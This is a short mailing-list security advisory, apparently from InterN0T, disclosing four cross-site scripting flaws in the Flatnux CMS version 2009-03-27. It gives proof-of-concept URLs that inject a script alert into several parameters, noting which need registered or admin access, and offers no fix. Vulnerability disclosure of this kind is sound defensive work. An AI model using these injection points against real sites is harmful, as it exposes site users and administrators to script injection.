[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[InterN0T] Flatnux 2009-03-27 - XSS Vulnerabilities + More
Flatnux - Cross Site Scripting Vulnerabilities + More
Version Affected: "2009-03-27" (newest)
Info: See website for more information.
-:: The Advisory ::-
Vulnerable Function / ID Calls:
mod, user, from, pk & dir (some has to be used in conjunction with other function calls)
Cross Site Scripting:
1. http://www.website.tld/flatnux/index.php?mod="><script>alert(0)</script> (anyone)
2. http://www.website.tld/flatnux/index.php?mod=login&op=profile&user="><script>alert(0)</script> (registered users only)
3. http://www.website.tld/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="><script>alert(0)</script> (admin only)
4. http://www.website.tld/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="><script>alert(0)</script> (admin only)
-:: Solution ::-
I didn't bother to find one, sorry.
- Vulnerabilities found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.
All of the best,